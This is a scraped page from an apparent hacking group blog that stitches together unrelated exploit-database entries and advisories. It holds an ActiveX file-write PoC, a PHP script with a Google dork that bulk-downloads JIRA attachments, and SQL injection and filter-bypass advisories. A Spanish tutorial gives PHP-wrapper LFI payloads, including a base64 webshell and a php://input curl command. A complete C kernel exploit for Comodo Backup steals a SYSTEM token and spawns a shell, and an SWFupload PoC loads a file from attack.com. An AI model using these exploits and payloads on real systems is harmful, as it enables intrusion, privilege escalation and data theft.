source: https://www.securityfocus.com/bid/48483/info
CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.
Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub
</script>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113546
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/48484/info
Atlassian JIRA is prone to a security bypass vulnerability.
An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application.
<?php
/*If it's a https, you MUST especify it on the URL or it won't work.
Try using numbers that you get from your results in google otherwise
you will get a lot of 404*/
echo "\n#########################################################
###################
# \n#Attachment downloader by Ignacio Garrido\n#";
if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/
1 12310371#
############################################################################\n";die;}
else{
echo "\n#Let's start!\n";
echo "#\n#Ign.sec@Gmail.com\n";
#\n############################################################################\n";}
$url2 = $argv[1];
if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}
if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}
$numero = $argv[2];
for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");
if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);
echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);
}
}
echo "\n#All attachment downloaded correctly!\n";
die;
?>
Document Title:
===============
Mangallam CMS - SQL Injection Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1421
Release Date:
=============
2015-01-26
Vulnerability Laboratory ID (VL-ID):
====================================
1421
Common Vulnerability Scoring System:
====================================
8.9
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote SQL-Injection web vulnerability in the official Mangallam Content Management System 2015-Q1.
Vulnerability Disclosure Timeline:
==================================
2015-01-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Mangallam Content Management System 2015-Q1.
The sql vulnerability allows an attacker to inject sql commands to compromise the application & database management system.
The sql injection vulnerability is located in the `newsid` value of the vulnerable `news_view.php` application file. Remote attackers
are able to inject own sql commands by manipulation of the vulnerable newsid value in the `news_view.php` file. A successful attack
requires to manipulate a GET method request with vulnerable `newsid` value to inject own sql commands. The injection is a classic
order by sql injection that allows to compromise the web-application and connected database management system. The request method to
inject own sql commands is GET and the vulnerability is located on the application-side of the service.
The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the application-side web vulnerability requires no privileged web-application user account and no user interaction.
Successful exploitation of the security vulnerability result in web-application and database management system compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] News
Vulnerable File(s):
[+] news_view.php
Vulnerable Parameter(s):
[+] newsid
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Dork(s):
allinurl:news_view.php?newsid=
title:Powered By Powered by Mangallam
PoC:
http://localhost:8080/news_view.php?newsid=-1'[REMOTE SQL-INJECTION VULNERABILITY!]--
Reference(s):
http://localhost:8080/news_view.php
Solution - Fix & Patch:
=======================
The remote vulnerability can be patched by usage of a prepared statement next to the newsid GET method request.
Restrict and filter the newsid value and disallow input of special chars. Prevent disaplaying of php errors by usage of the (0)error (php) function.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the content management system is estimated as critical.
Credits & Authors:
==================
IranGuard Security Team - P0!s0nC0d3
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=754
Barracuda Networks Security ID (BNSEC): 731
Release Date:
=============
2015-01-19
Vulnerability Laboratory ID (VL-ID):
====================================
754
Common Vulnerability Scoring System:
====================================
4.5
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Cloud Control Center 2014 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes.
The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling
to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20)
the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after
the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context
of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in
the cloud series products.
The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
of affected or connected module context.
Vulnerable Request Method(s):
[+] POST & GET
Proof of Concept (PoC):
=======================
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
PoC:
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
Solution - Fix & Patch:
=======================
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context
that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
Security Risk:
==============
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
En el caso de que tratemos con archivos PHP, existe un concepto que son los llamados PHP Wrappers. Un wrapper es una especie de envoltura que le dice al Stream (secuencia, petición, entrada/salida de datos) como actuar.
Esta característica de PHP es muy útil en ataques como el LFI y el XXE, gracias a esto, podemos obtener alguna que otra ventaja que de otra forma no tendríamos.
El concepto de wrapper quedará más claro cuando lo veamos ahora.
Índice:
- php://filter
- zip://
- data://
- php://input
- expect://
- Referencias
php://filter
El Wrapper filter nos permite encodear el archivo que le especifiquemos, esto es muy útil, ya que nos permite poder leer archivos PHP que en otro caso, el navegador simplemente interpretaría directamente.
Por ejemplo, tenemos el siguiente archivo:
Como vemos, tiene una contraseña en un comentario. Pero si nosotros accedemos al archivo desde la web:
Solo vemos la salida del código interpretado 😥. Sin embargo, usando el wrapper filter, seremos capaces de leer el archivo PHP al completo.
Para probar el wrapper, he creado un LFI en un archivo index.php. Por lo que, en este LFI, el payload que introduciremos para hacer uso del wrapper y leer el archivo secret.php, será el siguiente:
- php://filter/convert.base64-encode/resource=<archivo>
De esta forma, estamos leyendo el archivo secret.php pero en base64, por lo que si decodeamos esta salida:
Obtenemos el archivo al completo. Un detalle curioso sobre los wrappers es que podemos concatenar varios a través del uso de un pipe | o un slash /. Ejemplo:
Y obtenemos exactamente el mismo resultado.
Además de poder encodear en base64, podemos aplicar ROT13 con la siguiente cadena:
- php://filter/read=string.rot13/resource=<archivo>
Aunque este en concreto no sirve para leer archivos PHP:
Pero si aplica para otro tipo de archivos:
En conclusión, referente a este wrapper, tenemos los dos siguientes payloads:
- php://filter/convert.base64-encode/resource=<archivo>
- php://filter/read=string.rot13/resource=<archivo>
zip://
El wrapper zip nos permite ejecutar un php que hayamos metido dentro de un archivo zip. Incluso no hace falta que el archivo zip tenga como extensión zip, sino que puede tener cualquiera.
Este wrapper no está instalado por defecto, pero se puede instalar con el siguiente comando:
- sudo apt install phpX.Y-zip
Donde X e Y, es la versión PHP que tengamos instalada o a la que queramos instalarle esta característica.
Ejemplo de ejecución de webshell a través de este wrapper:
Payload:
- zip://<archivo zip>%23<archivo php>
En <archivo zip>, si no se encontrase en el directorio actual, se le especificaría el directorio donde se encontrase el archivo y listo.
Nota: en caso de que el archivo PHP fuese una webshell o esperase algún parámetro, se le agregaría con un ampersand como vemos en la siguiente imagen.
E incluso cambiando la extensión del zip, seguirá funcionando:
data://
El wrapper data nos permite incluir datos externos, incluido código PHP. Este wrapper solo funciona si la opción allow_url_include está activada en la configuración de PHP (la opción equivalente a un Remote File Inclusion).
Ejecutar código PHP con este wrapper es bastante sencillo, podemos hacerlo de dos formas:
- En texto plano
- En base 64
En texto plano, simplemente tendríamos que usar el siguiente payload:
- data:text/plain,<código PHP>
Ejemplo:
De cara a hacerlo usando base64, simplemente tendríamos que encodear el código PHP:
Y colocarlo en el wrapper tal que:
- data://text/plain;base64,<código PHP en base64>
- data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
De esta forma, como estamos definiendo un parámetro para ejecutar comandos, el payload para por ejemplo ejecutar el comando id sería:
- data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id
Ejemplo:
php://input
Este wrapper es parecido al de arriba (data). Se puede usar para incluir código PHP. Su requisito al igual que el wrapper data es que la opción allow_url_include de la configuración de PHP debe de estar habilitada.
Con esto hecho, se podría ejecutar comandos mandando el código PHP en los datos de una petición POST. Ejemplo:
- curl -s -X POST -d ‘<código PHP>’ ‘http://example.com/index.php?file=php://input’
En este caso, la salida del comando la podemos ver en la respuesta.
expect://
El wrapper expect no está instalado por defecto, pero en el caso de que lo esté, permite ejecutar directamente comandos de la siguiente forma:
- expect://<comando>
Esto ocurre porque este wrapper da acceso a una PTY (pseudo-teletype), que en UNIX básicamente se refiere a una terminal. Da acceso tanto al STDIN, STDOUT como STDERR.
Conclusión PHP Wrappers
Como hemos podido ver, esta característica de PHP es muy útil en muchas ocasiones, ya que nos puede ayudar conseguir acciones que de una u otra forma no podríamos. Es bastante útil hacer uso de ellas cuando estamos ante vulnerabilidades como el Local File Inclusion (LFI) o el XML External Entity (XXE), o realmente en cualquier caso donde veamos que tenemos la capacidad de usarlas.
Referencias
- What do pty and tty mean?
- expect://
- File Inclusion / Directory Traversal – HackTheBox Academy
Title : VLC Player 2.1.5 DEP Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9597
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-poc.flv
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-windbglog.txt
Title : VLC Player 2.1.5 Write Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9598
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451>
VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-poc.m2v
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-windbglog.txt
================================================================================
[REWTERZ-20140103] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140103
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
===================
Class: Improper Privilege Management
Impact: Low privileged user can access application data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
A user with limited privileges could gain access to certain
functionality that is available only to administrative users. For
example, users with Guest privileges can see the subjects of the
tickets, stats and other information related to tickets.
Proof-of-Concept
=============
http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
http://127.0.0.1:8080/swf/flashreport.swf
http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0
Timeline
======
23-Dec-2014 – Notification to Vendor
24-Dec-2014 – Response from Vendor
30-Dec-2014 – Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
/*
Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation
Date - 23rd January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.comodo.com
Tested Version - 4.4.0.0
Driver Version - 1.0.0.957 - bdisk.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/112828
CVE ID - CVE-2014-9633
Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version - 4.4.1.23
Fixed Driver Ver - 1.0.0.972
Note
----
Does not cleanly exit, had to use some leave instructions to get the command
prompt. If you know of a better way please do let me know.
Below in from Windows XP in IofCallDriver function.
eax = 12h
804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000
804e3801 52 push edx
804e3802 51 push ecx
804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090
804e3807 5e pop esi
804e3808 c3 ret
esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE token_steal_w7[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "bdisk");
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
printf("[+] Allocating memory at [0x%p]\n", base_addr);
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
else if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 7\n");
memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[~] Press any key to Exploit . . .\n");
getch();
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}
# Exploit Title: SWFupload All Version XSF Vulnerability
# Date: 25/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
# Verion : All
# Tested on: Linux / Window
#Description :
XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable
swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting
#Vulnerable Code :
ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);
this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
}
catch(ex:Object)
{
this.SetButtonTextStyle("");
}
try
{
As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
The vulneralbe SWF will load any file
http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf
2.
